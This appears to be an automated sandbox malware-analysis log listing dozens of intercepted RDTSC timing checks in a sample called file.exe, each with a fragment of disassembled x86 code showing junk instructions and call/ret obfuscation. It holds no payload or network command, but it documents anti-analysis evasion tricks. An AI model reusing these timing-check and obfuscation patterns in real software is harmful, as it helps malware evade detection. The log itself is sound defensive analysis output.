Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6F77 second address: 10F6F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6F7B second address: 10F6F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6F85 second address: 10F6F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F703A second address: 10F706F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 mov si, EDBFh 0x0000000b movsx edi, di 0x0000000e nop 0x0000000f pushad 0x00000010 jnc 00007EFDB8CDCB18h 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F706F second address: 10F7074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F7074 second address: 10F7091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8CDCB19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F75BA second address: 10F75D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jg 00007EFDB8F26A1Ch 0x00000012 jns 00007EFDB8F26A16h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FAB2F second address: 10FAB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FAB38 second address: 10FAB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FAB3C second address: 10FAB4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007EFDB8CDCB08h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FAB4E second address: 10FABBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFDB8F26A1Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub edi, 6E588800h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007EFDB8F26A18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 xchg eax, ebx 0x00000031 jmp 00007EFDB8F26A25h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jl 00007EFDB8F26A28h 0x0000003f jmp 00007EFDB8F26A22h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FB6B3 second address: 10FB6BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC128 second address: 10FC12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC12E second address: 10FC132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC132 second address: 10FC136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC136 second address: 10FC145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC145 second address: 10FC14B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC14B second address: 10FC151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC151 second address: 10FC155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC155 second address: 10FC1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, F191h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007EFDB8CDCB08h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 or esi, 243ED17Fh 0x0000002f mov edi, 04ED2E00h 0x00000034 push 00000000h 0x00000036 movzx edi, cx 0x00000039 push eax 0x0000003a pushad 0x0000003b jns 00007EFDB8CDCB08h 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FDB66 second address: 10FDB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FDB6C second address: 10FDB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FDB70 second address: 10FDB74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC962 second address: 10FC966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC966 second address: 10FC973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC973 second address: 10FC979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FE176 second address: 10FE17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FC979 second address: 10FC97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FEC9A second address: 10FECB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jo 00007EFDB8F26A20h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11026BA second address: 11026BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11026BE second address: 11026D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFDB8F26A1Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FF5D9 second address: 10FF5E3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFDB8CDCB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FFF95 second address: 10FFF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FFF99 second address: 10FFFA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11054BA second address: 11054C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11054C3 second address: 11054CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFDB8CDCB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1105A7C second address: 1105A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1105A80 second address: 1105A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007EFDB8CDCB06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1105B2B second address: 1105B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007EFDB8F26A16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1101885 second address: 11018A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11018A5 second address: 11018A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110289A second address: 110289E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110289E second address: 1102945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D3A35h] 0x00000011 pushad 0x00000012 movzx edx, cx 0x00000015 mov cx, ax 0x00000018 popad 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007EFDB8F26A18h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 adc ebx, 7F31090Ch 0x00000047 mov edi, dword ptr [ebp+122D38A5h] 0x0000004d mov eax, dword ptr [ebp+122D022Dh] 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007EFDB8F26A18h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 0000001Ah 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d stc 0x0000006e movzx edi, cx 0x00000071 push FFFFFFFFh 0x00000073 push esi 0x00000074 stc 0x00000075 pop ebx 0x00000076 sub dword ptr [ebp+122D2B19h], ebx 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007EFDB8F26A28h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1107C2C second address: 1107C5F instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFDB8CDCB0Ch 0x00000008 jp 00007EFDB8CDCB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jno 00007EFDB8CDCB0Ch 0x00000017 sub bx, A3EBh 0x0000001c push 00000000h 0x0000001e mov ebx, dword ptr [ebp+122D3A15h] 0x00000024 push 00000000h 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1108A5C second address: 1108A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFDB8F26A16h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1108A6A second address: 1108AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007EFDB8CDCB08h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 call 00007EFDB8CDCB15h 0x00000026 mov dword ptr [ebp+1245A8C2h], edx 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007EFDB8CDCB08h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 add ebx, dword ptr [ebp+122D3015h] 0x0000004f mov dword ptr [ebp+1247EF63h], esi 0x00000055 push 00000000h 0x00000057 jbe 00007EFDB8CDCB0Ch 0x0000005d mov dword ptr [ebp+122D2F74h], eax 0x00000063 xchg eax, esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1108AEB second address: 1108AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11037FE second address: 110380C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8CDCB0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110380C second address: 1103810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1105D17 second address: 1105D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109ADC second address: 1109AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109CF9 second address: 1109CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110BA36 second address: 110BA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109CFE second address: 1109D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110BA3A second address: 110BA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007EFDB8F26A18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 ja 00007EFDB8F26A1Ch 0x0000002a pushad 0x0000002b mov cx, 3E8Ch 0x0000002f popad 0x00000030 push 00000000h 0x00000032 sbb bx, 8730h 0x00000037 push 00000000h 0x00000039 sub dword ptr [ebp+122D3296h], eax 0x0000003f xchg eax, esi 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jg 00007EFDB8F26A16h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110DB33 second address: 110DB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110AAF3 second address: 110AAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110CBF6 second address: 110CC00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FBE4 second address: 110FBEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110AAF8 second address: 110AAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110CC00 second address: 110CC0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110AAFD second address: 110AB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110ABAE second address: 110ABB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FD41 second address: 110FD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FD46 second address: 110FD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFDB8F26A1Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FD5C second address: 110FD61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FD61 second address: 110FDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2354h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007EFDB8F26A18h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f jmp 00007EFDB8F26A1Ch 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+1247E9C1h], edi 0x00000041 mov eax, dword ptr [ebp+122D00E5h] 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007EFDB8F26A18h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 sub dword ptr [ebp+122D25DCh], edi 0x00000067 push FFFFFFFFh 0x00000069 jo 00007EFDB8F26A1Ch 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jno 00007EFDB8F26A16h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 110FDFA second address: 110FE0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1111F70 second address: 1111F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11166D2 second address: 11166D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11166D6 second address: 11166DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A015 second address: 111A02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007EFDB8CDCB11h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A02C second address: 111A033 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A033 second address: 111A03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A1C5 second address: 111A1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A1DA second address: 111A1E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FA78 second address: 111FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FB11 second address: 111FB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007EFDB8CDCB19h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 pushad 0x00000012 jmp 00007EFDB8CDCB14h 0x00000017 jnp 00007EFDB8CDCB06h 0x0000001d popad 0x0000001e pop esi 0x0000001f mov eax, dword ptr [eax] 0x00000021 jnp 00007EFDB8CDCB14h 0x00000027 pushad 0x00000028 jg 00007EFDB8CDCB06h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FB64 second address: 111FB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFDB8F26A25h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FB86 second address: 111FB90 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFDB8CDCB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FB90 second address: 111FB96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FB96 second address: 111FB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111FD2C second address: 111FD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7425 second address: 10B742B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B742B second address: 10B7430 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7430 second address: 10B743F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007EFDB8CDCB06h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
